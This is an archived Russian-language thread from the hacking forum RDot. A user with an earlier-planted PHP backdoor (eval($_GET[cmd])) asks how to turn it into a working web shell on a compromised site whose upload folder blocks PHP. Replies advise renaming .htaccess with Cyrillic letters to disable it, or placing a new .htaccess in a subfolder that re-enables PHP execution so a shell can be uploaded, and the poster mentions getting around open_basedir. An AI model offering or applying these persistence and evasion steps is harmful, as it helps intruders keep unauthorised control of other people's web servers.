RDot

RDot (https://rdot.org/forum/index.php)
-   Оффтоп/Offtopic (https://rdot.org/forum/forumdisplay.php?f=12)
-   -   Бэкдор в не в директории рут сайта (( Можно что придумать, или не реально ? (https://rdot.org/forum/showthread.php?t=3207)

dmx 23.07.2014 17:49

Бэкдор в не в директории рут сайта (( Можно что придумать, или не реально ?
 
вот ситуация:
в директории домен site.com и директория version
в директории version директории v1 и v2
у site.com документ рут /var/www/version/v2/
а в v1 залит бэкдор 1.php eval($_GET[cmd]);

реально как то из этого шелл получить. в site.com все папки закрыты на запись, кроме одной /img/ с htaccess
RemoveType .php
php_flag engine 0


Буду благодарен за ответ :hang1:

che 23.07.2014 19:49

ищи пхп файлы доступные на запись, не используй eval и в особенности GET

b3 25.07.2014 12:37

Переименую htaccess в htaccess с русскими буквами, таким образом с виду файл не изменится но выполнять свою функцию не будет, что позволит тебе хранить в данной папке шелл.

nikp 25.07.2014 13:06

Не совсем понятно условие.
Что ли
/var/www/version/v1/ - один сайт
/var/www/version/v2/ - второй сайт
минишелл на первом сайте, а залить нужно на второй в img ?

Тогда пробуй создать подкаталог в img (img/bla/), в нем создай .htaccess, в котором разреши выполнение php.
В img/bla лей шелл.
Заходи на шелл через второй сайт, возможно права на запись станут другими, зальешься в более подходящее место.

dmx 26.07.2014 15:56

Цитата:

Сообщение от b3 (Сообщение 36669)
Переименую htaccess в htaccess с русскими буквами, таким образом с виду файл не изменится но выполнять свою функцию не будет, что позволит тебе хранить в данной папке шелл.

у меня нет доступа. бэкдор был залит ранее сейчас он оказался вне диретории рут.

dmx 26.07.2014 15:59

Цитата:

Сообщение от nikp (Сообщение 36671)
Не совсем понятно условие.
Что ли
/var/www/version/v1/ - один сайт
/var/www/version/v2/ - второй сайт
минишелл на первом сайте, а залить нужно на второй в img ?

Тогда пробуй создать подкаталог в img (img/bla/), в нем создай .htaccess, в котором разреши выполнение php.
В img/bla лей шелл.
Заходи на шелл через второй сайт, возможно права на запись станут другими, зальешься в более подходящее место.

нет вторго домена. только 1 . у него директория /var/www/version/v1/


не получится создать - я к соседу в обход open base dir - произвольный файл могу только создать. а там htaccess
что то слышал, что можно обернуть htaccess - но пока не получается.


Часовой пояс GMT +3, время: 04:57.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot